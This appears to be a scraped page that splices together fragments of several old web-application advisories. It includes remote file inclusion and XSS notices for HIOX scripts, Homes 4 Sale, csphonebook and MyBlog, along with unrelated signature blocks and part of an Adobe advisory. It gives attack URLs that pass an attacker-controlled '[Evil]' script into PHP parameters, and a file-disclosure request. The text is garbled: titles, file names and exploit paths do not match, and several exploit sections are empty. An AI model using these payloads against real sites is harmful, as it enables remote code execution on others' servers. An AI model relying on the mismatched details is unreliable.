My Blog
Peter Van Eeckhoutte
peter.ve@corelan.be
____________________________________________________
My Blog : http://www.corelan.be:8800 (IPv4 and IPv6)
Twitter : http://www.twitter.com/corelanc0d3r
RIPE Handle PVE50-RIPE
a.k.a. c0d3r/c0d3rZ/corelanc0d3r on various forums
____________________________________________________
####################################################################################################
HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
####################################################################################################
[~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Error (hioxupdate.php + hioxstats.php) :
########################## www.BugReport.ir
#######################################
#
# AmnPardaz Security Research Team
#
# Title: MyBlog <=0.9.8 Multiple Vulnerabilities
# Vendor: http://crewdesign.co.uk & http://sourceforge.net/projects/myblog
# Exploit: Available
# Vulnerable Version: 0.9.8
# Impact: High
# Fix: N/A
[~] Exploit :
http://xxxx/[path]/phpUserBase_1_3_BETA/templates/default/header.inc.php?menu=[Evil]
########################## [ I love the Messenger of Allah Mohammad ] ##########################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
All Member Real Hack And All My Friends ..
################################################################################################
Real Hack Team ( R-H ) ..
################################################################################################
_________________________________________________________________
####################################################################################################
Homes 4 Sale Remote XSS Vulnerabilitiy
Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
####################################################################################################
[~] Found by : Ghost Hacker |, .-. .-. ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
[~] Name Script : Homes 4 Sale
[~] Download : http://www.needscripts.com/Resource/1445.html
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Exploit :
####################################################################################################
HIOX Star Rating System 1.0 Remote File Inclusion Vulnerability
Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
####################################################################################################
[~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
[~] Name Script : HIOX Star Rating System 1.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Error (addcode.php) :
[~] Example :
http://xxxx/[path]/download.php?dlfilename=index.php
###################################### [ Viva IslaM & KSA ] ######################################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends ..
##################################################################################################
Found by : Ghost Hacker [ R-H TeaM ]
##################################################################################################
_________________________________________________________________
Peter Van Eeckhoutte
peter.ve@corelan.be
____________________________________________________
My Blog : http://www.corelan.be:8800 (IPv4 and IPv6)
Twitter : http://www.twitter.com/corelanc0d3r
RIPE Handle PVE50-RIPE
a.k.a. c0d3r/c0d3rZ/corelanc0d3r on various forums
____________________________________________________
[~] Exploit :
http://xxxx/[path]/search_wA.php?LIBPATH=[Evil]
############################# [ I love the Messenger of Allah Mohammad ] ############################
[~] Greetz :
QaTaR BoeZ TeaM & Aseg-Rabe7 & PROTO & x.CJP.x & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
Root Hacker & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends And My Team ..
######################################################################################################
Real-hack.Net ( R-H TeaM ) ..
######################################################################################################
_________________________________________________________________
####################################################################################################
HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
####################################################################################################
[~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
[~] Name Script : HIOX Random Ad 1.3
[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Error (hioxRandomAd.php) :
[~] Exploit :
http://xxxx/[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil]
############################# [ I love the Messenger of Allah Mohammad ] ############################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
All Member Real Hack And All My Friends ..
######################################################################################################
Real Hack Team ( R-H ) ..
######################################################################################################
_________________________________________________________________
handled this security issue.
References:
===========
1. My Blog (contains the original advisory): http://roeehay.blogspot.com/
2. Demo of the exploit: http://www.youtube.com/watch?v=wJb6a-J3i4c
3. Adobe’s advisory:
http://www.adobe.com/support/security/bulletins/apsb09-10.html
####################################################################################################
csphonebook 1.02 Remote XSS Vulnerabilitiy
Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
####################################################################################################
[~] Found by : Ghost Hacker |, .-. .-. ,|
[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
[~] Name Script : csphonebook 1.02
[~] Download : http://common-solutions.de/download/csphonebook102.zip
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] dork :
MyBlog CMS RFI
Aurthor: Beenu Arora
mail: beenudel1986@gmail.com
Application:MyBlog: PHP and MySQL Blog/CMS software
RFI
Hello,,
MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..
http://sourceforge.net/projects/myblog/
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
|
